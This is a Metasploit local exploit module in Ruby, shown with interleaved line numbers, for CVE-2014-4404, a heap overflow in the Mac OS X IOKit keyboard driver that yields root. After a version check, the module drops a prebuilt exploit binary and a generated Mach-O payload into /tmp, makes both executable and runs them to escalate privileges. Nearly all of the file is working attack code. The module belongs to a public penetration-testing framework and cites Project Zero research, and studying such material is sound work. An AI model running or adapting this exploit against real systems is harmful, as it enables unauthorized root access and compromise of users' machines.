1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ManualRanking # Can cause kernel crash
8

9
  include Msf::Post::File
10
  include Msf::Post::OSX::Priv
11
  include Msf::Exploit::EXE
12
  include Msf::Exploit::FileDropper
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation',
19
        'Description' => %q{
20
          A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory
21
          corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel
22
          pointers can also be leaked, allowing a full kASLR bypass.
23

24
          Tested on Mavericks 10.9.5, and should work on previous versions.
25

26
          The issue was patched silently in Yosemite.
27
        },
28
        'License' => MSF_LICENSE,
29
        'Author' => [
30
          'Ian Beer', # discovery, advisory, publication, and a most excellent blog post
31
          'joev' # copy/paste monkey
32
        ],
33
        'References' => [
34
          [ 'CVE', '2014-4404' ],
35
          [ 'URL', 'http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html' ],
36
          # Heap overflow:
37
          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=40' ],
38
          # kALSR defeat:
39
          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=126' ]
40
        ],
41
        'Platform' => 'osx',
42
        'Arch' => ARCH_X64,
43
        'SessionTypes' => [ 'shell', 'meterpreter' ],
44
        'Targets' => [
45
          [ 'Mac OS X 10.9.5 Mavericks x64 (Native Payload)', {} ]
46
        ],
47
        'DefaultTarget' => 0,
48
        'DisclosureDate' => '2014-09-24',
49
        'Notes' => {
50
          'Reliability' => UNKNOWN_RELIABILITY,
51
          'Stability' => UNKNOWN_STABILITY,
52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
53
        }
54
      )
55
    )
56
  end
57

58
  def check
59
    if ver_lt(osx_ver, "10.10")
60
      CheckCode::Appears
61
    else
62
      CheckCode::Safe
63
    end
64
  end
65

66
  def exploit
67
    if is_root?
68
      fail_with Failure::BadConfig, 'Session already has root privileges'
69
    end
70

71
    if check != CheckCode::Appears
72
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
73
    end
74

75
    exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')
76
    binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))
77
    binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
78
    exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
79
    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
80

81
    print_status("Writing exploit file as '#{exploit_file}'")
82
    write_file(exploit_file, binary_exploit)
83
    register_file_for_cleanup(exploit_file)
84

85
    print_status("Writing payload file as '#{payload_file}'")
86
    write_file(payload_file, binary_payload)
87
    register_file_for_cleanup(payload_file)
88

89
    print_status("Executing payload...")
90
    cmd_exec("chmod +x #{exploit_file}")
91
    cmd_exec("chmod +x #{payload_file}")
92
    cmd_exec("#{exploit_file} #{payload_file}")
93
  end
94

95
  def osx_ver
96
    cmd_exec("sw_vers -productVersion").to_s.strip
97
  end
98

99
  def ver_lt(a, b)
100
    Rex::Version.new(a) < Rex::Version.new(b)
101
  end
102
end
103

104